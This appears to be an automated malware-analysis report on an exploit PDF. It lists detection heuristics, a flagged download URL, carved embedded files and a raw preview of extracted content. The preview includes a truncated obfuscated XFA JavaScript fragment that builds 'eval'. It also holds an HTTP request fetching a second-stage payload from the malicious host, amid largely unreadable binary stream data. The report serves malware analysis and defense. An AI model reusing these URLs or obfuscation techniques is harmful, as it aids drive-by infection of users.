MALICIOUS
78
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
The PDF file contains malformed streams and an XFA form, indicating it is likely an exploit document. The deobfuscated JavaScript attempts to download a second-stage payload from 'http://www.aviationweather.mn/'. The ML classifier strongly flags this PDF as malicious, supporting the exploitation of a client execution vulnerability.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 6
-
Malformed active-content stream length medium PDF_MALFORMED_EXPLOIT_STREAM_LENGTHA PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion/supporting evidence around Reader exploit streams.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
-
XFA form low PDF_XFAPDF uses XML Forms Architecture — can contain script logic
-
AcroForm button with action trigger low PDF_ACROFORM_BUTTONPDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger — this is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures
-
PDF differential parser failed info PDF_DIFFERENTIAL_PARSE_FAILEDThe cross-check parser (pdfminer.six) failed on this file: PDF differential parser failed: PDFSyntaxError. Static heuristics still ran and any of their findings above are valid; only the differential cross-check signal is missing.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.aviationweather.mn/ In PDF document text
- http://www.aviationweather.mn/x-flash-versionIn PDF document text
- http://www.xfa.org/schema/xfa-locale-set/2.1/In PDF document text
- http://ns.adobe.com/xdp/In PDF document text
- http://www.xfa.org/schema/xci/1.0/In PDF document text
- http://www.xfa.org/schema/xfa-template/2.2/In PDF document text
- http://www.xfa.org/schema/xfa-data/1.0/In PDF document text
Extracted artifacts 6
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_file_obj0041.bin |
pdf-embedded-file | PDF EmbeddedFile object 41 at offset 0x11B4 | 85 bytes |
SHA-256: c06dcd026a7ea0536b63e07ce688691b585339a3ab7ff59065e546b56308c7bb |
|||
embedded_file_obj0042.bin |
pdf-embedded-file | PDF EmbeddedFile object 42 at offset 0x1266 | 1029 bytes |
SHA-256: dda0835df994b8be920f715db36452f6cee7bb42bbc9c897f878a7b298ba8e91 |
|||
embedded_file_obj0063.bin |
pdf-embedded-file | PDF EmbeddedFile object 63 at offset 0x147F | 1079 bytes |
SHA-256: 8919e0fd4dd4b1dfb910aa2ef1b5ceb2f9c6e259ea7d1e25f1659ea483e94d4a |
|||
embedded_file_obj0044.bin |
pdf-embedded-file | PDF EmbeddedFile object 44 at offset 0x253D | 144 bytes |
SHA-256: 3dd68f00f4fcb366a2a3a17c65cb2626eeddf5ea5713302d374310561d810169 |
|||
embedded_file_obj0045.bin |
pdf-embedded-file | PDF EmbeddedFile object 45 at offset 0x25EA | 77 bytes |
SHA-256: 10c03f88a5f0a0833dc5b2c8ac295b3a3c6f65e23889eb8cc1dc6fe29bf7f275 |
|||
deobfuscated.js |
deobfuscated-js | PDF JavaScript deobfuscation pass | 13628 bytes |
SHA-256: 6f9b79af928df918485e46df92e8e2a9383950e963bbd408f00f87fb776d5b59 |
|||
Preview scriptFirst 1,000 lines of the extracted script
2 � � � � �� ; �
1.000 1.000 1.000 rg 0 0 m 9 0 l 9 9 l 0 9 l h f 0.000 0.000 0.000 RG 0 w 0 0 m 9 9 l S 9 0 m 0 9 l S
/CIDInit /ProcSet findresource begin
12 dict begin
begincmap
CIDSystemInfo
<< /Registry (Adobe)
/Ordering (UCS) /Supplement 0 >> def
/CMapName /Adobe-Identity-UCS def
/CMapType 2 def
1 begincodespacerange
<0000> <FFFF>
endcodespacerange
100 beginbfchar
<00> <FFFD>
<01> <FFFD>
<02> <FFFD>
<03> <FFFD>
<04> <FFFD>
<05> <FFFD>
<06> <FFFD>
<07> <FFFD>
<08> <FFFD>
<09> <FFFD>
<0A> <FFFD>
<0B> <FFFD>
<0C> <FFFD>
<0D> <FFFD>
<0E> <FFFD>
<0F> <FFFD>
<10> <FFFD>
<11> <FFFD>
<12> <FFFD>
<13> <FFFD>
<14> <FFFD>
<15> <FFFD>
<16> <FFFD>
<17> <FFFD>
<18> <FFFD>
<19> <FFFD>
<1A> <FFFD>
<1B> <FFFD>
<1C> <FFFD>
<1D> <FFFD>
<1E> <FFFD>
<1F> <FFFD>
<20> <0020>
<21> <0021>
<22> <0022>
<23> <0023>
<24> <0024>
<25> <0025>
<26> <0026>
<27> <0027>
<28> <0028>
<29> <0029>
<2A> <002A>
<2B> <002B>
<2C> <002C>
<2D> <002D>
<2E> <002E>
<2F> <002F>
<30> <0030>
<31> <0031>
<32> <0032>
<33> <0033>
<34> <0034>
<35> <0035>
<36> <0036>
<37> <0037>
<38> <0038>
<39> <0039>
<3A> <003A>
<3B> <003B>
<3C> <003C>
<3D> <003D>
<3E> <003E>
<3F> <003F>
<40> <0040>
<41> <0041>
<42> <0042>
<43> <0043>
<44> <0044>
<45> <0045>
<46> <0046>
<47> <0047>
<48> <0048>
<49> <0049>
<4A> <004A>
<4B> <004B>
<4C> <004C>
<4D> <004D>
<4E> <004E>
<4F> <004F>
<50> <0050>
<51> <0051>
<52> <0052>
<53> <0053>
<54> <0054>
<55> <0055>
<56> <0056>
<57> <0057>
<58> <0058>
<59> <0059>
<5A> <005A>
<5B> <005B>
<5C> <005C>
<5D> <005D>
<5E> <005E>
<5F> <005F>
<60> <0060>
<61> <0061>
<62> <0062>
<63> <0063>
endbfchar
100 beginbfchar
<64> <0064>
<65> <0065>
<66> <0066>
<67> <0067>
<68> <0068>
<69> <0069>
<6A> <006A>
<6B> <006B>
<6C> <006C>
<6D> <006D>
<6E> <006E>
<6F> <006F>
<70> <0070>
<71> <0071>
<72> <0072>
<73> <0073>
<74> <0074>
<75> <0075>
<76> <0076>
<77> <0077>
<78> <0078>
<79> <0079>
<7A> <007A>
<7B> <007B>
<7C> <007C>
<7D> <007D>
<7E> <007E>
<7F> <2022>
<80> <20AC>
<81> <2022>
<82> <201A>
<83> <0192>
<84> <201E>
<85> <2026>
<86> <2020>
<87> <2021>
<88> <02C6>
<89> <2030>
<8A> <0160>
<8B> <2039>
<8C> <0152>
<8D> <2022>
<8E> <017D>
<8F> <2022>
<90> <2022>
<91> <2018>
<92> <2019>
<93> <201C>
<94> <201D>
<95> <2022>
<96> <2013>
<97> <2014>
<98> <02DC>
<99> <2122>
<9A> <0161>
<9B> <203A>
<9C> <0153>
<9D> <2022>
<9E> <017E>
<9F> <0178>
<A0> <0020>
<A1> <00A1>
<A2> <00A2>
<A3> <00A3>
<A4> <00A4>
<A5> <00A5>
<A6> <00A6>
<A7> <00A7>
<A8> <00A8>
<A9> <00A9>
<AA> <00AA>
<AB> <00AB>
<AC> <00AC>
<AD> <002D>
<AE> <00AE>
<AF> <00AF>
<B0> <00B0>
<B1> <00B1>
<B2> <00B2>
<B3> <00B3>
<B4> <00B4>
<B5> <00B5>
<B6> <00B6>
<B7> <00B7>
<B8> <00B8>
<B9> <00B9>
<BA> <00BA>
<BB> <00BB>
<BC> <00BC>
<BD> <00BD>
<BE> <00BE>
<BF> <00BF>
<C0> <00C0>
<C1> <00C1>
<C2> <00C2>
<C3> <00C3>
<C4> <00C4>
<C5> <00C5>
<C6> <00C6>
<C7> <00C7>
endbfchar
56 beginbfchar
<C8> <00C8>
<C9> <00C9>
<CA> <00CA>
<CB> <00CB>
<CC> <00CC>
<CD> <00CD>
<CE> <00CE>
<CF> <00CF>
<D0> <00D0>
<D1> <00D1>
<D2> <00D2>
<D3> <00D3>
<D4> <00CC8>
<CF34>
<C5> <00a1B>
<char
<6CC>
<CD> <009> <006> <00CE>
<CF> <00CCD> <0> <00C34C D1> 5S4ACC>
<C
<D2> <00D2>> <00DC>
<D4> <00EBt76 <00EB
<D4> 0EB
<D4> 0EB>
<CF3> <00aB>
<Df0a1B>
<009>D2> A6 <00CC<00CCD60> <006eC <00>
<Df04F15C
<C
<D1ACC>
<<00CE><6CC>
00EBt0DC>
<DDC>
CC3> <02>> <048 <00D25Bt76 <00EB
<a1B>
<D4> 02> A6 <00EB>
<CCD60> <006eC <0CCD60>0>
<Df DCMapNa0a1B>
<Df04F15C
<
<<000CE><>
<DACC>
<3> <t0DC>
C
<C
<5mD25BC
<5mD048 <05mD048 <05mDmD048 65> A6CC>
<<25Bt6 <00C53<00D25Df DCM00D2 A6 <0>
<Df0eCBt6 4<006eCD05CE><>
<05CE><3> <t0 <001<5mD25C
<5mD3D25C7D06eCD5mD0
D/1D0CE><>D<DACD>
<3> Dt0DCD
C
<C
D5mD2DBC
<5mD048 D05mD04C5>
<DDmD048D65> D6CC>
<D25BtD <00C5D<00DE5Df DCE00D2EA6 <0>E<Df0ECBt6 4E006eED05CE>E>
<0ECE><3>E<t0 E001<5mE25C
E5mD3D2EC7D0EeCD5mDE
D/1E0CE><>E<DACE>
<3> Et0DCE
C
<C
E5mD2EBC
<5mE048 E05mD04E5>
<EDmD048E65> E6CC>
<E25BtE <00C5E<00DF5Df DCF00D2FA6 <0>F<Df0FCBt6 4F006eFD05CE>F>
<0FCE><3>F<t0 F001<5mF25C
F5mD3D2FC7D0FeCD5mDF
D/1F0CE><>F<DACF>
<3> Ft0DCF
C
<C
F5mD2FBC
<5mF048 F05mD04F5>
<FDmD0484C>
<F6CC>
<F25BtF <00C5>
<2A>
/CS0 cs /P0 scn
1 i
288 720 m
288 441 l
369 441 l
369 720 l
288 720 l
h
f
0 0 0 RG
0 i 0.5 w 10 M 0 j 0 J [0.5 1]0 d
287.75 441 m
369.25 441 l
S
369 720.25 m
369 440.75 l
S
[2 1]0 d
288 720.25 m
288 440.75 l
S
/Caption <</MCID 0 >>BDC
0 0 0 rg
1 i
BT
/C0_0 1 Tf
0 Tc 0 Tw 0 Ts 100 Tz 0 Tr 10 0 0 10 288 446.587 Tm
<002A>Tj
<004E>Tj
<0042>Tj
<0048>Tj
<0046>Tj
<0001>Tj
<00
9iCr/<00
9iCr C
9iCr
a 0 258<C 0 58<C 0 58<C 10 288 44 P 288 44
0 08 44
jf P 2
j C i
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/" xmlns:xfa="http://www.xfa.org/schema/xci/1.0/"><trace><area level="1" name="font"></area></trace><agent name="designer"><!-- [0..n] --><destination>pdf</destination><pdf><!-- [0..n] --><fontInfo></fontInfo></pdf></agent><present><!-- [0..n] --><pdf><!-- [0..n] --><fontInfo><embed>1</embed></fontInfo><version>1.6</version><creator>Adobe Designer 7.0</creator><producer>Adobe Designer 7.0</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present><acrobat><acrobat7><dynamicRender>forbidden</dynamicRender></acrobat7><common><locale></locale><data><incrementalLoad></incrementalLoad><adjustData></adjustData><xsl><uri></uri></xsl><outputXSL><uri></uri></outputXSL></data><template><base>C:\</base><relevant></relevant><uri></uri></template></common></acrobat></config>
<template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns=""><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="http://www.xfa.org/schema/xfa-template/2.2/" activity="initialize">
<xfa:script contentType='application/x-javascript'>
vcx='Init';
with(event){
cxz='ev';
cxz+='a';
l="l";
t=target;
cxz+=l;
cr4='rep';
cr4+='lace';
if(event.name===vcx){
==v';
)></e8
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"><xfa:data><form1><ImageField1></ImageField1></form1></xfa:data></xfa:datasets>
</xdp:xdp>
/CIDInit /ProcSet findresource begin
12 dict begin
begincmap
CIDSystemInfo
<< /Registry (Adobe)
/Ordering (UCS) /Supplement 0 >> def
/CMapName /Adobe-Identity-UCS def
/CMapType 2 def
1 begincodespacerange
<0000> <FFFF>
endcodespacerange
10 beginbfchar
<0001> <0020>
<0027> <0046>
<002A> <0049>
<0042> <0061>
<0045> <0064>
<0046> <0065>
<0048> <0067>
<004A> <006f dddddddd6> <00dddddg n6
d eC>pp t8r0r 9e 6 t8 ndentity-UC nd eC>pp-UCita2 t>pp-UC/
C nd <a d
C nde n/abe)
/iDt6nd eC> aita2 t>n
aicn t>n C
aicE t>n Dg npp t8r n6cod > <0061>
curr064
preamble
config
template
datasets
localeSet
postamble
/Helv 0 Tf 0 g
form1[0].#subform[0].ImageField1[0]
Image Field
/CourierStd 10.00 Tf 0 g
o�[eK�ʎ�=�+ rP�䨼#�'��I9��r! �J^��ܔ;�2a� �����[�V~���o�[�-~+��o���� �����[�V~���o�[�-~+��o���� ����w�;�N~�����;� ~'����w��� ����w�;�N~�����;� ~'����w��� ������{�^~�����{�=~/�������� ������{�^~�����{�=~/�������� �?� � �A����;�����;Y�YP�@��f�fA� ͂� � 5 4 j h �,�,�Y�YP�@��f�fA� ͂�E�E5�4�j i �,�,ꝉ��� �?��G�Q��?� �G�#�( � ���� �?��G���uv�%'��3��풍ο[�fZ�;��<;��2� Y�a ɺ �ſ-�>Ӳ}��� �Y&b�ٮ^��o���������e7��͐� ]����9'KV����y&? ���=�� �G �� ��
�_��8]��V�տ�g�OW�����r��!1?I�L�Oұ��I:gb~�l��I����$]���$�Ob~��k���$sb~��'1?�<��!1?I���'� Ɵ����� �?���g�Y��?˟�g�3�, Ɵ����� �?���g�Y��?˟�g�3�, �_�/��� ���/� �E����_�/s^�_ �;� ��� � + +*V(VT�P��X�XQ�B��b�bE�
Ŋ�U�U � �*V
Myriad Pro
Identity
Adobe
?��eٕ'� �*�̪�{���`"� y � ��P � � � ��Z �� � E ܿ�@ 5 b��O���Z
P a.�� � _P @�� L G�����` Z�ڎ��
0 �0Z�
endstream
endobj
41 0 obj<</Length 89/Filter[/FlateDecode]/Type/EmbeddedFile>>stream
H������Q(K-*��ϳU2�3PRH�K�O��K�U
qӵP��㲩H
��d ` �t �
endstream
endobj
42 0 obj<</Length 504/Filter[/FlateDecode]/Type/EmbeddedFile>>stream
x��S�n�0 � �� 1��
��bŀ �e� �v�%�UkK�D'�ߏ�c�E�m���|$ ���l�
m��! $�� �� *U�PCԏ�* ��]��|���/� �F
?r� $�����NJ _�+�������;:û�|(�1�� �o����6����hx F� � i��j�^��} Q橏t��~ ��� ���3 |O]O �Ǘ�* Sk¶k ��RE���? $$ �MԸ ��u�k*����.���� ۻgt
endstream
endobj
63 0 obj<</Length 1313/Filter/FlateDecode/Type/EmbeddedFile>>stream
x��Z[S ɒ~> � � V ���w7Ќ K��}Y�c�� 赐tZ
fؘ��_f 1v��Aa��*��eV��þ~/��>:�<͛U�8X ���|�χ�Ū, u>����� ��# �J � ��}������.� �ղ��== � ��] ?�aJ�/�P�*��# � �>� >�U� 3V�{H�D�yXu�(��6���� u�� �{ �
ًƽ���9G�M[/*Z��]���㛋��`?�U��
� ^� �����Af���G�O��aKlgU �{ ǴV �]- �vY?��|8_��
r�zSw�P�%5�Ơ�c]7�̇� tmQ
� �J� � < /��e>|l�jQ �� �? �'䳯_�#vd�� ����^X� �W]Uw����r� !����&��d� Ԝ(Z ˛�[}�b '��_Z,6 �U�� ?��� � *x#h�ł�G�Yr��a٭6�I[ܯ���G��
�
�j<�<�d� � c�� x Vg*�3� (d��g�b�3n �xK �G�gR
� 2gf�w 3�8� g�h�d ���]E�.� �N���8����M{ ��S
v� I�#�#N� �� �T�Ho1U1�i���T� 2� �a �⊄ ���
�o ���5 p�( �E� <ŃN �� ��+l�( �A}���
G�at� �fЦ �q�y�k��>�Ŀ QF4e1G8��'��4ʳQ^ �Q����/�i�E�����<L<
�4���:kTЖ" � ��t�n��f^�L��u
W�U� � � ���o������<h�}�= ��m� l����/�������� "^W� P�w}[���S[ՋvYo� -}(� V�R� �V���am/�߂� �16
endstream
endobj
44 0 obj<</Length 105/Filter[/FlateDecode]/Type/EmbeddedFile>>stream
H�T�A
� D� �sj+�2� ��
2C =~ E�|üaD6� E
:�*�m �D}��xp ��
3�g�iіP�� t�E-ų �q�vR��f=�zS 𧻂W���< Ez1�
endstream
endobj
45 0 obj<</Length 1919/Type/EmbeddedFile>>stream
<localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.1/"></localeSet>
endstream
endobj
46 0 obj<</Length 19/Filter[/FlateDecode]/Type/EmbeddedFile>>stream
H��ѯH
�@ � ٖ��Z
��O� P � _a.��P ��5 ��PG� < < �� � ��Z E ( �@ � ٕ��Z
��O� P � _a.��P ��/V ��P�� < < �� � ��Z E ( �@ � ٔ��Z
��O� P � _a.��P ��%
��P�� < < �� � ��Z E ( �@ � ٓ��Z
��O� P � _a.�7P �� � ��P�� � � �� � ��Z E � �@ � ����Z
��O� P���"���_P ���� GET /iprofy/covered/deemed-hill-believe-trucks.php?xfgh=1h:1k:1i:1f:31&akhtcqmx=30:3e:3a:3i&ngv=33:2v:31:1i:30:1j:1i:1k:1l:2w&aevrouja=myz HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.aviationweather.mn/
x-flash-version: 10,0,32,18
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1
ImageField1[0]
form1[0]
#subform[0]
Adobe
UCS
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
��
!
"
#
$
%
&
'
(
)
*
+
,
-
.
/
0
1
2
3
4
5
6
7
8
9
:
;
*
N
B
H
F
event
event.name===vcx
Adobe
UCS
��
'
F
*
I
B
a
E
d
F
e
H
g
J
o����`
a
>/aa<au>tx>mg il<tx>/au>/ato>bre mn=
<pr>vle<etIaeFed/et<vle<cpin<odrxls
>pavu<xIgFl/x<ae/po<rrms
<a>aettmeidtt/l>ctnbd l=
/r<l>e>a e<e>vu<ai>oexn
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.